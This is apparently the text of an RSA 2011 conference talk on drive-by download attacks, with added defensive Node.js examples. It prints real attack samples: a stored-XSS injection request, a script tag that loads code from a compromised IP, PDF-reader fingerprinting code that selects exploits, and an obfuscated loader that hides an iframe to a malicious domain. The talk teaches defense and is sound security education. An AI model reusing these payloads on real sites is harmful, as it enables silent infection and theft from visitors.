drive by downloads: how to avoid getting a cap popped in your app
Presentation delivered at the RSA 2011 Conference on how to better protect your website from hacker attacks
Lars Ewe, Cenzic
Neil Daswani, Dasient
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive-By via XSS on RSA Conf Website
Discovered by Gerry Eisenhaur (Dasient)
Persistent XSS in Jive
“Benign” drive-by injected / Pops up calc.exe
Script element embedded in a “tag” at: https://365.rsaconference.com/people/gerrye?view=bookmarks
Un-escaped tag (and benign drive-by) rendered at https://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102
Yet again: use of SSL alone does not provide security; the code must be made secure as well!
Check This Out …
Agenda
Quick History of Security
Malware Anatomy & Distribution
Lifecycle of Malware Protection
Future of Web Security
Quick History: Security
Evolution of Security
1980s: Anti-Virus
1986: Brain virus (Pakistan)
1990: More viruses: Fish, Flip, Whale
1991-98: Famous Michelangelo. Symantec introduces Norton
1998-2004: Internet surge; new viruses (Melissa, I Love You, Nimda, SQL Slammer, Sobig.F, Nachi, Sasser) cause havoc
Over 60K known viruses. Frequent updates provided by vendors.
1990s: Network Security
Late 90s: With the explosion of the Internet, network firewalls control traffic
Intrusion Detection Systems (IDS) introduced to monitor anomalous activity
Intrusion Prevention Systems (IPS) combined IDS & network firewalls
Network vulnerability scanning tools introduced to aid vulnerability management
2000s: Application Security
Late 90s: Internet growth; companies tighten the perimeter but ignore applications
Some vulnerability scanning tools & WAFs deployed, but security holes remain, especially for custom apps
Drive-by downloads mature from prototype attacks to mainstream
2007: SQL injection used to inject malicious drive-by-download code in addition to data theft
2009: Gumblar web worm infects 80K servers; Web malware used in Aurora attack; widget attacks
2010: Over 1M web sites infected in one quarter; large government websites hit (NIH, US Treasury, EPA)
Fundamental Change in Malware Distribution
Late 80s to 90s: distribution via floppy disks; malware is executable code in a static file; what is exploited: the PC, OS and client-side apps; infects clients.
Late 90s to mid-2000s: distribution via worms, attachments and file downloads; malware is executable code in a static file; what is exploited: the PC, OS and client-side apps; infects clients.
Mid-2000s to present: distribution via drive-by downloads (at legitimate sites); malware is active content on web pages; what is exploited: web applications and servers; infects servers in order to infect clients. Websites suffer brand, revenue, and customer losses when infected.
Malware Anatomy & Distribution
Step 1: Infect a Site (or 2 or 3 or Thousands!)
There is no perimeter
Web 2.0 / external content: Ads (malvertising), mash-ups, widgets, external images, user generated content (HTML, images, links, exe, documents)
Software vulnerabilities: SQL injection, XSS, PHP file include, un-patched software (blog, CMS, shopping cart)
Passwords compromised: FTP credentials, SSH credentials, web server credentials
Infrastructure vulnerabilities: vulnerable hosting platform, network vulnerabilities
Step 1. Infect via Stored XSS
HTTP request to inject script:
http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript src=baddomain.com%3E%3C/script%3E
Server's response contains:
<p>Your favorite food is 'cookies <script src=baddomain.com></script>' returned the following results:</p>
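Added here as an example (not code from the slides): the "favorite food" response from the stored-XSS slide rendered the vulnerable way beside an HTML-encoded version, in Node; the function names are hypothetical.

```javascript
// Added example (not from the slides): the "favorite food" page from the stored-XSS slide,
// rendered the vulnerable way and the encoded way. Function names are hypothetical.

// The slide's query string value, URL-decoded the way a server would ('+' is a space).
const SLIDE_PAYLOAD = decodeURIComponent(
  "cookies+%3Cscript src=baddomain.com%3E%3C/script%3E".replace(/\+/g, " ")
);

// Vulnerable: untrusted input is concatenated straight into the HTML body, exactly as on
// the slide, so the <script> tag is parsed as markup and executed by every visitor.
function renderUnsafe(favoriteFood) {
  return "<p>Your favorite food is '" + favoriteFood + "' returned the following results:</p>";
}

// Entity-encode the characters that can change HTML context. Encode rather than strip:
// the user's text survives verbatim, but the browser never treats it as markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Fixed: same template, but the value is encoded for the HTML-body context it lands in.
function renderSafe(favoriteFood) {
  return "<p>Your favorite food is '" + escapeHtml(favoriteFood) + "' returned the following results:</p>";
}

// Review check: does the rendered page still contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```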
Step 1: Inject Really Malicious JavaScript
Sources in malicious JavaScript from a compromised IP!
Infects user's machine silently
<script id=_0_ src=//218.93.202.61/cp/></script>
Step 2: Invoke Client-Side Vulnerability
CVE-2008-2992: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104
CVE-2007-5659: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.
CVE-2009-0927: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
Step 2: Ex. Fingerprint PDF Reader
JavaScript generates a zero-size IFRAME in the web page, and that IFRAME sources a PDF file
PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser)
Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
function pdf_start(){
  // Normalise app.viewerVersion (e.g. 8.12) to its digits and split into major / minor / patch
  var version=app.viewerVersion.toString();
  version=version.replace(/\D/g,'');
  var version_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
  // Reader 8.1.2 and earlier: util.printf (CVE-2008-2992)
  if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]<3)){util_printf();}
  // Reader 8.1.1 and earlier: collab_email (CVE-2007-5659)
  if((version_array[0]<8)||(version_array[0]==8&&version_array[1]<2&&version_array[2]<2)){collab_email();}
  // Reader before 9.1: Collab.getIcon (CVE-2009-0927)
  if((version_array[0]<9)||(version_array[0]==9&&version_array[1]<1)){collab_geticon();}
}
pdf_start();
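Added here as an example (not code from the slides): a Node re-implementation of the fingerprinting script's version gate, so an analyst can check which branch a captured sample would take for a given Reader version without opening the PDF. app.viewerVersion becomes a parameter, the slide's helper names are returned as strings rather than called, and the CVE noted against each branch is inferred from the version ranges in the CVE list above.

```javascript
// Added example (not from the slides): the version gate of the fingerprinting script as a
// stand-alone function. app.viewerVersion is passed in; nothing is exploited, the function
// only reports which of the slide's three branches the sample would have entered.
function targetedBranches(viewerVersion) {
  // Same normalisation as the sample: stringify, strip non-digits, keep the first three digits.
  // For a two-digit version such as "9.1", charAt(2) is "" which compares as 0 below.
  const digits = String(viewerVersion).replace(/\D/g, "");
  const v = [digits.charAt(0), digits.charAt(1), digits.charAt(2)];
  const hits = [];
  // Branch 1 (util.printf, CVE-2008-2992). Comparisons copied verbatim: because && binds
  // tighter than ||, the right-hand term alone fires whenever the second digit is 1 and the
  // third is below 3, whatever the major version.
  if ((v[0] == 8) && (v[1] == 0) || (v[1] == 1 && v[2] < 3)) hits.push("util_printf");
  // Branch 2 (collab_email, CVE-2007-5659): anything below 8, or 8.x with x<2 and patch <2.
  if ((v[0] < 8) || (v[0] == 8 && v[1] < 2 && v[2] < 2)) hits.push("collab_email");
  // Branch 3 (Collab.getIcon, CVE-2009-0927): anything below 9, or 9.0.
  if ((v[0] < 9) || (v[0] == 9 && v[1] < 1)) hits.push("collab_geticon");
  return hits;
}

// Fleet check: of the Reader versions you have deployed, which would this sample still
// try to exploit? The version list is supplied by the caller (constructed in the test).
function exposedVersions(versions) {
  return versions.filter((ver) => targetedBranches(ver).length > 0);
}
```

Note that a fully patched 9.1.x reader falls through all three branches, while 8.1.3 still enters the getIcon branch even though the CVE text lists it as fixed: the sample's checks are coarser than the advisory.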
Step 3: Deliver Shellcode
Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode
“Spray” the heap with assembly instructions that give shell access
Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
Step 4: Send ‘Downloader’
Example: 2k8.exe
Step 5: Join a Botnet: e.g. Zeus
Zeus Botnet + Targeted Phishing
Botnet propagation + Targeted Phishing:
1. http://internetbanking.gad.de/banking/
2. http://hsbc.co.uk
3. http://www.mybank.alliance-leicester.co.uk
4. http://www.citibank.de
What Next?
Steal credentials (e.g., Zeus)
Sell fake anti-virus (e.g., Koobface)
Steal FTP credentials (e.g., Gumblar)
Steal corporate secrets (e.g., Aurora)
Collect fraudulent click revenue (e.g., ClickbotA)
Evolution: Multi-DOM Node Injection
The injected carrier node and the script that decodes it (the hidden URL is spread across two DOM nodes and padded with filler characters that the script strips out):
<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div>
<script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');</script>
What the browser ends up rendering:
<iframe src=gate4ads.info width=0 height=0></iframe>
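Added here as an example (not code from the slides): a static decoder for the multi-DOM-node pattern above, for checking a captured page offline. It pairs each script that reads a div by id and strips a character class from its innerHTML with that div, applies the same replace() and unescape() without executing the script, and returns the hidden iframe targets. The sample HTML and its domain (bad.example) are constructed; only the obfuscation scheme is taken from the slide.

```javascript
// Added example (not from the slides): offline decoder for the carrier-div + script pattern.
// SAMPLE_HTML is constructed for this example and mirrors the slide's scheme with a
// placeholder domain (bad.example).
const SAMPLE_HTML = [
  "<div id=f37z>*!@b$a+*d*.##e+@x^a!m!p$l+e@@</div>",
  "<script>document.write('<iframe src=\\''+unescape(document.getElementById('f37z')",
  ".innerHTML.replace(/[\\+!*^#@$]/g,\"\"))+'\\' width=0 height=0></iframe>');</script>",
].join("\n");

// Matches getElementById('<id>').innerHTML.replace(/<class>/g,"") and captures id and class.
const CARRIER_READ_RE =
  /getElementById\(['"]([^'"]+)['"]\)\s*\.innerHTML\.replace\(\/(\[[^\]]*\])\/g,\s*(?:""|'')\)/g;

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

function decodeHiddenIframes(html) {
  const targets = [];
  let m;
  while ((m = CARRIER_READ_RE.exec(html)) !== null) {
    const id = m[1];
    const charClass = m[2];
    // Locate the carrier <div> the script refers to and take its inner text.
    const divRe = new RegExp(
      "<div[^>]*\\bid=[\"']?" + escapeRegExp(id) + "[\"']?[^>]*>([\\s\\S]*?)<\\/div>", "i");
    const div = divRe.exec(html);
    if (!div) continue;
    // Apply exactly the transformation the in-page script would, without running any of it.
    const decoded = unescape(div[1].replace(new RegExp(charClass, "g"), ""));
    targets.push({ id: id, target: decoded });
  }
  CARRIER_READ_RE.lastIndex = 0; // reset the global regex for the next call
  return targets;
}
```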
Infection Library
Infection Library: Example Entry
Lifecycle of Malware Protection
Defense-In-Depth: Lifecycle of Malware Protection
Assess: Vulnerability & Malware Risk Assessment
Prevent: Security Design Review, Secure Coding Practices, Fix Bugs, WAF, Code Reviews
Detect: Web Anti-Malware (WAM) Monitoring
Contain: mod_antimalware
Recover: Remove malcode
Future of Web Security
Risk Tolerance
F500 / G1000 / SME / SMB
Mission Critical Security / Important Security / Adequate Security
Integrated Web Scanning / Malware Cloud Solution (Cenzic / Dasient)
Broad offering, high volume, low cost
On-premise software / Managed Service
Manage Website Risk: Fast & Easy
Test All Apps For HealthCheck
Strong Testing for Important Apps
Robust Testing for Critical Apps
(Risk score axis: Low to High)
Takeaways: What You Should Do Within 3 Months
Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware
Prioritize your vulnerabilities based on risk score
Block until you remediate
Get Feb 2011 Ponemon research report on the state of web application security
Integrated HealthCheck Offer & Learn More
Get a Free, Integrated Website HealthCheck! Get a listing of all website vulnerabilities in an easy to read report!
Just email: [email protected]
For more information on Web vulnerability scanning and malware, visit us!
Cenzic: www.cenzic.com / http://blog.cenzic.com
Dasient: www.dasient.com / http://blog.dasient.com
Thank You!
Lars Ewe, Cenzic
Neil Daswani, Dasient